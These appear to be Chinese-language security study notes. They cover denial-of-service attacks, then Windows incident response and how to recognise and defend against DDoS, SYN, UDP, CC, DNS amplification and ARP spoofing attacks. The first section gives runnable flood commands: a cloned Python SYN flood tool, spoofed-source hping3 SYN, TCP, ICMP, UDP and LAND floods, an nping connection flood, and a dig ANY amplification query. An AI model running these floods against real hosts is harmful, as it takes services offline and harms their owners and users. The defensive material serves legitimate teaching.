DOS补充

SYN洪水攻击（Syn Flood）

1
2
3

git clone https://github.com/EmreOvunc/Python-SYN-Flood-Attack-Tool.git
cd Python-SYN-Flood-Attack-Tool
python3 py3_synflood_cmd.py -t [目标ip] -p [端口号] -c 5

DNS放大攻击

典型的流量放大攻击，以小汇多，利用协议特定进行放大流量

1
2
3
4

# 安装
sudo apt-get install dnsutils
# 使用
dig ANY [域名] @[DNS地址，例如114.114.114.114]

使用后DNS服务器会返回信息（回包）给目标域名，导致端口受阻。

hping3

定制发送任何的数据包

参数解释：

-a伪造数据包

-q不返回

-n不解析域名

-s源端口

-d字节数

-p端口

--flood以flood形式进行攻击

syn-flood

1
2
3

sudo hping3 -c 3000 -d 120 -S -w 64 -p [端口号] --flood --rand-source [目标ip]
或（简化版）
sudo hping3 -S -P -p 80 --flood --rand-source [目标ip]

tcp-flood

1

sudo hping3 -SARUFP -p [端口号] --flood --rand-source [目标ip]

icmp-flood

1

sudo hping3 -q -n -a 1.1.1.1 --icmp -d 56 --flood [目标ip]

udp-flood

1

sudo hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood [目标ip]

LAND

一种特殊的syn-flood攻击，源地址和目的地址都是受害者，自己和自己完成三次握手

1

sudo hping3 -n -a [目标ip] -S -d 100 -p 80 --flood [目标ip]

TCP全链接DOS攻击

注： 命令中的数据任意，够大就行

1

nping --tcp-connect --rate=10000 -c 10000000000 -q [目标ip]

应急响应

如果我被黑客入侵了会发生什么？

• web入侵： 挂马、网页篡改、植入webshell、黑页、暗链等
• 主机入侵： 病毒木马、勒索病毒、远控后门、系统异常、RDP爆破、SSH爆破、主机漏洞、数据库入侵等
• 网络攻击： DDOS/CC攻击、ARP攻击、DNS/HTTP劫持
• 路由器交换机攻击： 内网病毒、配置错误、机器本身漏洞

查看日志

使用日志查看器

方法一： 使用Win+R并输入mmc打开控制台根节点，在工具栏中选择 文件–添加/删除管理单元–事件查看器 并添加

方法二： 右键桌面上的“此电脑”，点击“管理”，选择事件查看器即可。

方法三： 使用Win+R并输入eventvwr.msc回车即可

Windows日志位置：

Windows 2000/2003/xp：\%Systemroot%\System32\Config\*.evt

Windows vista/7/8及以后：\%Systemroot%\System32\winevt\Logs\*evtx

检查账户

图形化界面检查

可以在刚才的mmc中 添加本地用户和组 ，也可以在“此电脑”的 管理 中打开

检查Guest账户是否开启、是否存在隐藏账户等

通过注册表检查

转到\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\下，检查其中名字较长的几个文件夹是否有可以账户存在

文件分析

检查临时目录

转到C:\Users\Administrator\Local Settings\Temp（必须直接敲完整路径，不然找不到）

检查桌面文件夹C:\Users\Administrator\Desktop

检查访问记录

转到C:\Users\Administrator\Recent（必须直接敲完整路径，不然找不到）

这是最近访问的文件

检查文件修改时间

检查hosts文件

网络行为排查

使用网络沙箱：

TotalVirus

微步云沙箱

检查备案情况：

ICP/IP地址/域名信息备案管理系统

直接Google

网络连接排查

cmd执行：

netstat -ano 查看可疑连接和进程

tasklist 找到可疑进程

流量分析

使用WireShark、Charles

漏洞和补丁信息

命令systeminfo

打开Windows自动更新

网络攻击的判断与防御

DDOS通用防御

限制单ip请求、负载均衡、cdn、禁止icm、隐藏真实ip、流量清洗、优化tcp/ip栈、代码合理使用缓存、cdn云清洗

syn攻击判断

服务器cpu占用率高，大量SYN_RECEIVED网络连接状态，网络恢复后负载瞬间变高，断开后负载下降】

防御： 提高半开放连接队列的大小

udp攻击判断

服务器cpu占用率高，每秒大量数据包，tcp正常

cc攻击

服务器cpu占用率高，web服务器出现service unavailable提示，大量establish网络连接，单ip高达上百，用户无法正常访问

DNS放大攻击

大量的dns请求

防御： ips规则，关闭递归查询，DNS解析器只接受受信任的域名服务，acl

ARP欺骗判断

cmd执行arp -a查看mac地址是否重复，特别是网关

防御： 防火墙，mac地址绑定

可疑进程分析

1. tasklist查看进程

• 名称随机，后缀也不是exe的是可疑进程
• 任务管理器中svchost.exe运行的权限太过普通（例如你的用户名）

2. tasklist | findstr 进程名称
3. 可以使用 pchunter 软件查看
4. wmic process | find "进程id" > proc.csv
5. tasklist /svc

启动项排查

1. 排查以下几个位置：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

其他见1.14 自启动和DOS攻击初步的2.2部分

2. Win+R输入msconfig在 启动 选项卡中查看启动项（高版本Windows可能移动到任务管理器中）
3. 排查C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
4. 排查是否有可疑的服务

计划任务排查

排查C:\Windows\System32\Tasks和C:\Windows\Tasks

也可以在mmc或者此电脑的管理中查看计划任务

特定事件痕迹

1. 挖矿程序

2. 勒索病毒

使用工具：Windows Kernel Explorer

下载地址：AxtMueller/Windows-Kernel-Explorer